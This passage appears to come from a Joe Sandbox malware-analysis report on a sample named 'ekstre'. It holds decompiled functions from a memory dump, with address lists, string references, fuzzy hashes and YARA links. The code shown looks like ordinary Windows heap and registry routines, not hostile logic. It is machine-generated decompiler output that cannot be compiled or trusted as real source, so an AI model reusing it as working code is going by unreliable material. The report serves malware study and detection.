													 *(_t38 + 4) = _t30;
													 *_t30 = _t38;
													 *0x34265244 = _t38;
													goto L18;
												}
											}
										}
									}
								}
								goto L22;
								L18:
								_t65 =  &(_t65[1]);
								_t54 = 0x20;
							} while ( *_t65 != 0);
							goto L19;
						}
					}
				}
				L22:
				return _t16;
			}

0x341f942e
0x341f942f
0x341f9442
0x341f944a
0x341f944e
0x341f955d
0x341f955d
0x341f9454
0x341f9456
0x341f945d
0x341f945d
0x341f945f
0x341f9465
0x341f946d
0x341f9472
0x341f9475
0x341f947c
0x341f9558
0x341f9558
0x341f955b
0x00000000
0x341f9482
0x341f9482
0x341f9484
0x341f9489
0x341f948c
0x341f9496
0x341f949c
0x341f9554
0x341f9554
0x341f94a2
0x341f94a4
0x341f94a5
0x341f94a7
0x341f94a8
0x341f94a8
0x341f94ab
0x341f94b0
0x00000000
0x00000000
0x341f94b7
0x341f94b7
0x341f94bc
0x341f94be
0x341f94c4
0x00000000
0x341f94ca
0x341f94cc
0x341f94cf
0x341f94d0
0x341f94da
0x341f94dd
0x341f94e0
0x341f94e5
0x00000000
0x00000000
0x00000000
0x341f94e5
0x341f94e7
0x341f94ec
0x00000000
0x341f94ee
0x341f94f6
0x341f94f9
0x341f94ff
0x341f9502
0x00000000
0x341f9504
0x341f950e
0x341f9512
0x00000000
0x341f9514
0x341f951d
0x341f951d
0x341f951f
0x341f9523
0x341f9528
0x341f9534
0x00000000
0x341f9536
0x341f9536
0x341f9538
0x341f953b
0x341f953d
0x00000000
0x341f953d
0x341f9534
0x341f9512
0x341f9502
0x341f94ec
0x00000000
0x341f9543
0x341f9543
0x341f954a
0x341f954b
0x00000000
0x341f94a5
0x341f949c
0x341f947c
0x341f9562
0x341f9566

Strings

verifier.dll, xrefs: 341F94F0

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 67d14a214b22ac2c88adbcf8e4eaee5d108995296a5f18f9c5d2027b0693fef9
Instruction ID: 52a1905ff88e0ef51f2769de3dd3cf8c4d97fabfd58bc22d1c417201275a8b1b
Opcode Fuzzy Hash: 67d14a214b22ac2c88adbcf8e4eaee5d108995296a5f18f9c5d2027b0693fef9
Instruction Fuzzy Hash: 2731F5B57206019FE7149F1CDC90B2677E5EB98354F9081AAE544EF381EB72C8828B54

Uniqueness

Uniqueness Score: -1.00%

Function 341A7425 Relevance: 1.4, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E341A7425(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				signed int _t72;
				void* _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t79;

				_v12 = _v12 & 0x00000000;
				_t77 = __edx;
				_t75 = __ecx;
				if(__edx == 0 || __ecx == 0) {
					L24:
					return 0xc000000d;
				} else {
					_t62 = _a4;
					if(_t62 == 0) {
						goto L24;
					}
					_v16 =  *_t62;
					_t64 = E34185D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xaa);
					_v20 = _t64;
					if(_t64 == 0) {
						return 0xc0000017;
					}
					_t45 =  *(_t77 + 6) & 0x0000ffff;
					if(( *(_t77 + 6) & 0x0000ffff) <= 0) {
						_v24 = _t64;
						_v28 = 0xaa0000;
						if(E34194F40( *(_t77 + 4) & 0x0000ffff,  &_v28) != 0) {
							L6:
							_t76 = _a8;
							_t66 = _a12;
							if( *_t62 <= 0 ||  *_t62 > _t66) {
								L8:
								_t72 = _v16;
								_t79 = _t72 + 1 + ((_v28 & 0x0000ffff) >> 1);
								if(_t76 != 0) {
									if(_t72 >= _t79) {
										goto L9;
									}
									if(_t79 >= _t66) {
										L10:
										if(_t76 != 0) {
											_v12 = 0xc0000023;
										}
										L11:
										 *_t62 = _t79;
										goto L12;
									}
									L341B88C0(_t76 + _t72 * 2, _v24, _v28 & 0x0000ffff);
									 *((short*)(_t76 + _t79 * 2 - 2)) = 0;
									goto L11;
								}
								L9:
								if(_t79 < _t66) {
									goto L11;
								}
								goto L10;
							} else {
								if(E34192CEB(_v24,  *_t62) != 0) {
									L12:
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v20);
									return _v12;
								}
								_t66 = _a12;
								goto L8;
							}
						}
						_v12 = 0xc00000e5;
						goto L12;
					}
					E341B5050( *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2),  &_v28,  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0x10)) +  *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2) * 2);
					goto L6;
				}
			}

0x341a742d
0x341a7433
0x341a7436
0x341a743a
0x341e4439
0x00000000
0x341a7448
0x341a7448
0x341a744d
0x00000000
0x00000000
0x341a7455
0x341a746e
0x341a7470
0x341a7475
0x00000000
0x341e4417
0x341a747b
0x341a7482
0x341a74f6
0x341a74fe
0x341a750c
0x341a74a1
0x341a74a4
0x341a74a7
0x341a74aa
0x341a74b4
0x341a74b4
0x341a74c0
0x341a74c4
0x341a7515
0x00000000
0x00000000
0x341a7519
0x341a74ca
0x341a74cc
0x341e442d
0x341e442d
0x341a74d2
0x341a74d2
0x00000000
0x341a74d2
0x341a7527
0x341a7531
0x00000000
0x341a7531
0x341a74c6
0x341a74c8
0x00000000
0x00000000
0x00000000
0x341a7538
0x341a7546
0x341a74d4
0x341a74e3
0x00000000
0x341a74e8
0x341a7548
0x00000000
0x341a7548
0x341a74aa
0x341e4421
0x00000000
0x341e4421
0x341a749c
0x00000000
0x341a749c

Strings

#, xrefs: 341E442D

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction ID: 07ea69910650d339c351313fff44c70bfb11969eb4cf551fa2c1cc41842a13b2
Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction Fuzzy Hash: D341A07AA00E19DFEB15CF88C4D0BBEBBB5EF40745F01449AE85597240DB34DA41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 341A360F Relevance: 1.4, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E341A360F(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				void* _v96;
				intOrPtr* _t41;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t53;
				signed int _t55;
				void* _t58;
				intOrPtr* _t59;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr _t69;
				void* _t72;
				intOrPtr* _t73;
				intOrPtr _t75;
				void* _t76;
				signed int _t80;

				_t69 = __edx;
				_t82 = (_t80 & 0xfffffff8) - 0x5c;
				_v8 =  *0x3426b370 ^ (_t80 & 0xfffffff8) - 0x0000005c;
				_t41 = _a4;
				_v96 = _t41;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(_t41 == 0) {
					L23:
					_t75 = 0xc000000d;
					goto L10;
				} else {
					_t75 = 0;
					 *_t41 = 0;
					if(__edx == 0) {
						goto L23;
					} else {
						_t73 = __edx + 4;
						_t59 =  *_t73;
						while(_t59 != _t73) {
							_t68 = _t59 - 8;
							if( *_t68 != 0x74736c46) {
								_v72 = 1;
								_v68 = 1;
								_v88 = 1;
								_push( &_v92);
								_v84 = _t75;
								_v76 = 4;
								_v64 = _t73;
								_v60 = _t68;
								_v92 = 0xc0150015;
								L341C8A60(_t68, _t69);
								_t61 = _t59 - 8;
							}
							if( *(_t61 + 4) == 0x20) {
								L22:
								_t59 =  *_t59;
								1 = "true";
								continue;
							} else {
								_t53 = _t75;
								_t69 = _t61;
								while(( *(_t69 + 0x20) & 0x00000004) == 0) {
									_t53 = _t53 + 1;
									_t69 = _t69 + 0x30;
									if(_t53 < 0x20) {
										continue;
									} else {
										goto L22;
									}
									goto L24;
								}
								_t55 =  *(_t61 + 4) + 1;
								 *(_t61 + 4) = _t55;
								 *(_t61 + 0x14) =  !_t55;
								_t12 = _t69 + 0x18; // 0x100000016
								_t61 = _t12;
								if(_t61 == 0) {
									goto L22;
								} else {
									L9:
									 *((intOrPtr*)(_t65 + 8)) = 8;
									 *_v96 = _t65;
									L10:
									_pop(_t72);
									_pop(_t76);
									_pop(_t58);
									return L341B4B50(_t75, _t58, _v8 ^ _t82, _t69, _t72, _t76);
								}
							}
							goto L24;
						}
						_t60 = E34185D90(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t75, 0x618);
						if(_t60 == 0) {
							_t75 = 0xc0000017;
							goto L10;
						} else {
							L18();
							 *((intOrPtr*)(_t60 + 4)) = 1;
							_t18 = _t60 + 0x18; // 0x18
							_t65 = _t18;
							 *((intOrPtr*)(_t60 + 0x14)) = 0xfffffffe;
							_t48 = _t60 + 8;
							_t69 =  *_t73;
							if( *((intOrPtr*)(_t69 + 4)) != _t73) {
								_t66 = 3;
								asm("int 0x29");
								 *_t66 = 0x74736c46;
								 *((intOrPtr*)(_t66 + 0x10)) = 0;
								_t67 = _t66 + 0x1c;
								_t49 = 0x20;
								do {
									 *((intOrPtr*)(_t67 - 4)) = 0;
									 *_t67 = 0;
									_t67 = _t67 + 0x30;
									 *((intOrPtr*)(_t67 - 0x2c)) = 0xc;
									 *((intOrPtr*)(_t67 - 0x28)) = 0;
									_t49 = _t49 - 1;
								} while (_t49 != 0);
								return _t49;
							} else {
								 *_t48 = _t69;
								 *((intOrPtr*)(_t48 + 4)) = _t73;
								 *((intOrPtr*)(_t69 + 4)) = _t48;
								 *_t73 = _t48;
								goto L9;
							}
						}
					}
				}
				L24:
			}

0x341a360f
0x341a3617
0x341a3621
0x341a3625
0x341a3628
0x341a362b
0x341a362c
0x341a362d
0x341a3630
0x341e2969
0x341e2969
0x00000000
0x341a3636
0x341a3636
0x341a3638
0x341a363c
0x00000000
0x341a3642
0x341a3642
0x341a3647
0x341a364a
0x341a364e
0x341a3657
0x341e2925
0x341e2929
0x341e292d
0x341e2935
0x341e2936
0x341e293a
0x341e2942
0x341e2946
0x341e294a
0x341e2952
0x341e2957
0x341e2957
0x341a3661
0x341e295f
0x341e295f
0x341e2963
0x00000000
0x341a3667
0x341a3667
0x341a3669
0x341a366b
0x341a36ab
0x341a36ac
0x341a36b2
0x00000000
0x341a36b4
0x00000000
0x341a36b4
0x00000000
0x341a36b2
0x341a3674
0x341a3675
0x341a367a
0x341a367d
0x341a367d
0x341a3682
0x00000000
0x341a3688
0x341a3688
0x341a368c
0x341a3693
0x341a3695
0x341a369b
0x341a369c
0x341a369d
0x341a36a8
0x341a36a8
0x341a3682
0x00000000
0x341a3661
0x341a36cd
0x341a36d1
0x341a3701
0x00000000
0x341a36d3
0x341a36d5
0x341a36da
0x341a36e1
0x341a36e1
0x341a36e4
0x341a36eb
0x341a36ee
0x341a36f3
0x341a370a
0x341a370b
0x341a370f
0x341a3717
0x341a371a
0x341a371d
0x341a371e
0x341a371e
0x341a3721
0x341a3723
0x341a3726
0x341a372d
0x341a3730
0x341a3730
0x341a3735
0x341a36f5
0x341a36f5
0x341a36f7
0x341a36fa
0x341a36fd
0x00000000
0x341a36fd
0x341a36f3
0x341a36d1
0x341a363c
0x00000000

Strings

Flst, xrefs: 341A3651

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: e33cfd34e2ffc83803475672815ff9c2f390fad7fe7fccffe443398880d28d08
Instruction ID: 5c95d31c44963d1646d58a8687a52315c0edecd54efaefaebf8d9344ecc5cc01
Opcode Fuzzy Hash: e33cfd34e2ffc83803475672815ff9c2f390fad7fe7fccffe443398880d28d08
Instruction Fuzzy Hash: 1441C9B9604B01DFE304CF18C5D0B16FBE5EB89710F5581AEE958CB281DB71C982CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 342066D0 Relevance: 1.4, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E342066D0(void* __ecx, signed int _a4, intOrPtr _a8, char* _a12) {
				signed int _v8;
				char _v112;
				char _v113;
				char _v120;
				signed int _v124;
				char* _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t35;
				signed char _t40;
				signed char _t46;
				intOrPtr _t49;
				void* _t55;
				signed char _t59;
				void* _t60;
				void* _t61;
				char* _t62;
				signed int _t63;
				signed int _t65;

				_v8 =  *0x3426b370 ^ _t65;
				_t35 = _a12;
				_t63 = _a4;
				_v128 = _t35;
				_t62 =  &_v112;
				 *_t35 = 1;
				if(_a8 != 0 || _t63 == 0) {
					_t36 = 0xc000000d;
				} else {
					_v113 = 0;
					_push( &_v120);
					_push(0x68);
					_push(_t62);
					_push(0x10);
					_push(_t63);
					_t55 = E341B3F60();
					if(_t55 >= 0) {
						L7:
						_t40 =  *(_t62 + 2) & 0x0000ffff;
						_t59 = _t40;
						if((_t40 & 0x00000010) == 0) {
							L16:
							 *_v128 = 0;
						} else {
							_t63 =  *(_t62 + 0xc);
							if(_t59 < 0) {
								asm("sbb esi, esi");
								_t63 =  ~_t63 & _t63 + _t62;
							}
							if(_t63 != 0) {
								_v124 = _v124 & 0x00000000;
								while(1) {
									_t60 = E34197FD0(_t63, 0x11,  &_v124);
									if(_t60 == 0) {
										goto L16;
									}
									if(( *(_t60 + 1) & 0x00000008) != 0) {
										continue;
									} else {
										_t46 =  *((intOrPtr*)(_t60 + 9));
										if(_t46 != 0 &&  *((intOrPtr*)(_t60 + 0xc + (_t46 & 0x000000ff) * 4)) >= 0x2000) {
											goto L16;
										}
									}
									goto L17;
								}
							}
							goto L16;
						}
						L17:
						if(_v113 != 0) {
							goto L18;
						}
						goto L19;
					} else {
						if(_t55 == 0xc0000023) {
							_t49 =  *0x34265d78; // 0x0
							_t62 = E34185D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t49 + 0x140000, _v120);
							if(_t62 != 0) {
								_v113 = 1;
								_push( &_v120);
								_push(0x68);
								_push(_t62);
								_push(0x10);
								_push(_t63);
								_t55 = E341B3F60();
								if(_t55 < 0) {
									L18:
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t62);
								} else {
									goto L7;
								}
								L19:
								_t36 = _t55;
							} else {
								_t36 = _t55 - 0xc;
							}
						}
					}
				}
				return L341B4B50(_t36, _t55, _v8 ^ _t65, _t61, _t62, _t63);
			}

0x342066df
0x342066e6
0x342066eb
0x342066ef
0x342066f2
0x342066f5
0x342066f8
0x342067e0
0x34206706
0x34206709
0x3420670d
0x3420670e
0x34206712
0x34206713
0x34206715
0x3420671b
0x3420671f
0x34206770
0x34206770
0x34206774
0x34206778
0x342067bf
0x342067c2
0x3420677a
0x3420677a
0x34206780
0x34206787
0x34206789
0x34206789
0x3420678d
0x3420678f
0x34206793
0x3420679f
0x342067a3
0x00000000
0x00000000
0x342067a9
0x00000000
0x342067ab
0x342067ab
0x342067b0
0x00000000
0x00000000
0x342067b0
0x00000000
0x342067a9
0x34206793
0x00000000
0x3420678d
0x342067c5
0x342067c9
0x00000000
0x00000000
0x00000000
0x34206721
0x34206727
0x3420672d
0x34206749
0x3420674d
0x3420675a
0x3420675e
0x3420675f
0x34206761
0x34206762
0x34206764
0x3420676a
0x3420676e
0x342067cb
0x342067d7
0x00000000
0x00000000
0x00000000
0x342067dc
0x342067dc
0x3420674f
0x3420674f
0x3420674f
0x3420674d
0x34206727
0x3420671f
0x342067f3

Strings

#, xrefs: 34206721

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4a3a09c458e1f4df388e7d6b78259a9a7d6ce51540d394025e33ed1610304922
Instruction ID: d4c6efab7e3e65dac8fef8d4c56ec3a62da867dbb9b0807bb8f8ae0eaaf89914
Opcode Fuzzy Hash: 4a3a09c458e1f4df388e7d6b78259a9a7d6ce51540d394025e33ed1610304922
Instruction Fuzzy Hash: 8A31C535600759DEFB21CA68C850F9A77F9DF45754F1080ACE940BB2A1DBB5D809CF90

Uniqueness

Uniqueness Score: -1.00%

Function 341EC6F2 Relevance: 1.3, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E341EC6F2(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = L341B2B00();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = E34185D90(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = L341B2B00();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x341ec701
0x341ec704
0x341ec707
0x341ec70d
0x341ec70e
0x341ec712
0x341ec717
0x341ec71a
0x341ec71b
0x341ec71c
0x341ec71d
0x341ec71f
0x341ec722
0x341ec729
0x341ec72a
0x341ec72b
0x341ec732
0x341ec736
0x341ec738
0x341ec738
0x341ec743
0x341ec7ac
0x341ec7ae
0x341ec7b0
0x341ec7c0
0x341ec7c2
0x341ec7cf
0x341ec7cf
0x341ec7d5
0x341ec7da
0x341ec7da
0x341ec7b5
0x341ec7ba
0x00000000
0x341ec7ba
0x341ec758
0x341ec75c
0x341ec766
0x341ec767
0x341ec76d
0x341ec76e
0x341ec770
0x341ec771
0x341ec779
0x341ec77d
0x341ec7be
0x00000000
0x341ec7be
0x341ec783
0x341ec78b
0x341ec78b
0x341ec790
0x341ec794
0x00000000
0x341ec796
0x341ec799
0x341ec799
0x341ec7a3
0x341ec7a5
0x341ec7a5
0x00000000
0x341ec7a3
0x341ec794
0x341ec75e
0x00000000

Strings

BinaryName, xrefs: 341EC722

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 464313dc6fb5454f91ca0bf671c06bf2ca7783b9c923388d34748ca647cf0e38
Instruction ID: 1619a7793c70619e4bdde41fa40cf15c1fb0371ab41d95ca6259dedb197803ac
Opcode Fuzzy Hash: 464313dc6fb5454f91ca0bf671c06bf2ca7783b9c923388d34748ca647cf0e38
Instruction Fuzzy Hash: 3F31F47AD00E19AFEB15CA58CC85D7BBB75EB82760F014169E810A7250E7309E44C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 341C717A Relevance: .7, Instructions: 705
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E341C717A(signed int __ecx, signed int __edx, signed int _a4, signed short _a8, signed short _a12) {
				unsigned int _v5;
				signed int _v6;
				signed int _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed short _v32;
				signed int _v36;
				signed int* _v40;
				signed short _v44;
				signed int _v48;
				signed short _v52;
				signed int _v56;
				char _v60;
				unsigned int _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t250;
				signed short _t252;
				signed short _t253;
				signed short _t254;
				unsigned int _t267;
				signed short _t270;
				signed int _t271;
				signed int* _t274;
				signed int _t276;
				signed int _t281;
				signed char _t282;
				signed short _t283;
				signed short _t289;
				signed char _t290;
				signed int _t295;
				signed short _t298;
				signed short* _t299;
				signed int _t305;
				signed short _t307;
				signed int _t310;
				signed short _t315;
				void* _t318;
				signed int _t322;
				signed short _t323;
				signed short _t328;
				signed char* _t329;
				signed char _t330;
				signed int _t335;
				signed int _t344;
				signed short _t348;
				signed short _t351;
				signed char _t353;
				signed char _t355;
				signed short _t356;
				signed short _t358;
				signed short _t359;
				signed short _t361;
				unsigned int _t362;
				signed int _t363;
				signed int _t370;
				signed int _t372;
				signed short _t373;
				signed short _t374;
				unsigned int _t378;
				void* _t387;
				unsigned int _t392;
				void* _t393;
				signed short _t395;
				signed int _t396;
				signed short _t397;
				signed int* _t406;
				intOrPtr _t409;
				signed short _t425;
				unsigned int _t430;
				intOrPtr* _t431;
				unsigned int _t437;
				void* _t442;
				void* _t443;
				signed short* _t444;
				unsigned int _t445;
				signed short _t449;
				unsigned int _t456;
				void* _t463;
				signed int _t476;
				void* _t478;
				signed char _t480;
				signed short _t481;
				void* _t483;
				signed int _t486;
				signed int _t491;
				signed int* _t492;
				signed short* _t494;
				void* _t497;
				signed short _t498;
				signed short _t499;
				intOrPtr _t504;
				signed int _t509;
				unsigned int _t511;
				signed int _t519;
				signed short _t521;
				signed int _t523;
				signed short _t527;
				signed int _t528;
				signed int _t531;
				signed int _t535;
				signed int _t536;
				signed int _t541;
				signed short _t542;
				signed short* _t545;
				signed char* _t546;
				unsigned int _t547;
				signed short _t550;
				void* _t552;
				signed int _t553;
				signed short _t555;

				_t535 = __ecx;
				_t378 = 0;
				_t249 = __edx;
				_v12 = __ecx;
				_v20 = __edx;
				_t518 = 0;
				if( *((intOrPtr*)(__ecx + 8)) != 0xddeeddee) {
					__eflags =  *(__ecx + 0x44) & 0x01000000;
					if(( *(__ecx + 0x44) & 0x01000000) != 0) {
						L148:
						_t250 = E34183C60(_t535, _t518, _t249);
						_t519 = _t250 & 0x000000ff;
						__eflags = _t250;
						if(_t250 == 0) {
							goto L7;
						}
						L149:
						_t252 = _a12;
						__eflags = _t252;
						if(_t252 != 0) {
							__eflags = 0;
							 *_t252 = 0;
						}
						_t253 = _a8;
						__eflags = _t253;
						if(_t253 != 0) {
							 *_t253 = _t378;
						}
						_t254 = E34183C20(_t535);
						__eflags = _t254;
						if(_t254 != 0) {
							__eflags = _a4 & 0x10000000;
							if((_a4 & 0x10000000) == 0) {
								L3422E8B1(_t535, _v20);
							}
						}
						goto L7;
					}
					__eflags =  *(__ecx + 0x48) & 0x00000001;
					if(__eflags == 0) {
						__eflags = __edx & 0x00000007;
						if((__edx & 0x00000007) != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(__edx);
							_t387 = 9;
							E34235FED(_t387, __ecx);
						} else {
							_t518 = __edx - 8;
							__eflags =  *(_t518 + 7) - 5;
							if( *(_t518 + 7) == 5) {
								_t518 = _t518 - (( *(_t518 + 6) & 0x000000ff) << 3);
								__eflags = _t518;
							}
							__eflags =  *(_t518 + 7) & 0x0000003f;
							if(( *(_t518 + 7) & 0x0000003f) == 0) {
								_push(_t378);
								_push(_t378);
								_push(_t378);
								_push(_t518);
								_t463 = 8;
								E34235FED(_t463, _t535);
								_t518 = _t378;
							}
						}
					} else {
						_t518 = E3416A4D2(0, __ecx, __edx, 0, __ecx, __eflags);
					}
					__eflags = _t518;
					if(_t518 != 0) {
						_t249 = _v20;
						__eflags =  *((char*)(_t249 - 1)) - 5;
						if( *((char*)(_t249 - 1)) != 5) {
							L59:
							__eflags =  *(_t518 + 7) - _t378;
							if( *(_t518 + 7) >= _t378) {
								goto L148;
							}
							_t392 = _t518 >> 0x00000003 ^  *_t518 ^  *0x34266964 ^ _t535;
							__eflags = _t392;
							if(_t392 != 0) {
								L146:
								_push(_t378);
								_push(_t378);
								_push(_t378);
								_push(_t518);
								_t393 = 3;
								E34235FED(_t393, _t535);
								L65:
								_t519 = 1;
								goto L149;
							}
							_t395 =  *(_t518 - (_t392 >> 0xd));
							_v16 = _t395;
							__eflags = _t395;
							if(_t395 == 0) {
								goto L146;
							}
							_t536 =  *(_t395 + 4);
							_t476 =  *(_t518 + 4) >> 0x00000008 & 0x0000ffff;
							_v24 = _t536;
							_v32 = _t378;
							_v36 = _t476;
							_t396 =  *( *((intOrPtr*)( *_t395)) + 0xc);
							_v44 = _t396;
							_t267 =  *(_t536 + 0x10) ^ _t396 ^ _t536 ^  *0x34266964;
							__eflags = (_t267 & 0x0000ffff) + (_t267 >> 0x10) * _t476 + _v24 - _t518;
							if((_t267 & 0x0000ffff) + (_t267 >> 0x10) * _t476 + _v24 == _t518) {
								_t270 = E34183C40();
								__eflags = _t270;
								if(_t270 == 0) {
									_t271 = 0x7ffe0380;
								} else {
									_t271 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								_t478 = 1;
								__eflags =  *_t271 - _t378;
								if( *_t271 != _t378) {
									_t271 =  *[fs:0x30];
									__eflags =  *(_t271 + 0x240) & 1;
									if(( *(_t271 + 0x240) & 1) != 0) {
										_t93 = _t518 + 8; // 0x8
										_t271 = E3422F247( *((intOrPtr*)(_v44 + 0xc)), _t93, 2);
										_t478 = 1;
										__eflags = 1;
									}
								}
								__eflags = _t478 -  *0x7ffe036a;
								_t397 = _t378;
								_v44 = _t397;
								asm("sbb eax, eax");
								_v48 = _t271 & 0x00000064;
								_t274 = _v16 + 0x10;
								_v40 = _t274;
								while(1) {
									_t541 =  *_t274;
									_t276 = _t541 >> 0x10;
									_v28 = _t541;
									__eflags = _t276 & 0x00008000;
									if((_t276 & 0x00008000) != 0) {
										goto L77;
									}
									asm("lock cmpxchg [esi], ecx");
									_t542 = _v28;
									__eflags = _t541 - _t542;
									if(_t541 == _t542) {
										L79:
										 *(_t518 + 7) = 0x80;
										__eflags = _t542 - 0xffffffff;
										if(_t542 != 0xffffffff) {
											_t521 = _v16;
											asm("btr [eax], ecx");
											__eflags =  *((intOrPtr*)(_t521 + 0xc)) - _t378;
											if( *((intOrPtr*)(_t521 + 0xc)) == _t378) {
												L88:
												_t281 = (_t542 & 0x0000ffff) + _v32 + 0x00000001 | _v36 << 0x00000010;
												_t545 =  *_t521;
												__eflags = _t281 -  *(_t521 + 0x18);
												if(_t281 !=  *(_t521 + 0x18)) {
													L127:
													 *(_t521 + 0x10) = _t281;
													_t282 =  *(_t521 + 0x1c);
													__eflags = _t282 & 0x00000002;
													if((_t282 & 0x00000002) != 0) {
														L64:
														_t535 = _v12;
														goto L65;
													}
													_t283 = L34183AF6(_t545, _t521);
													__eflags = _t283;
													if(_t283 == 0) {
														goto L64;
													}
													_t219 = _t521 + 0x1c; // 0x4
													_t546 = _t219;
													while(1) {
														_t480 =  *_t546;
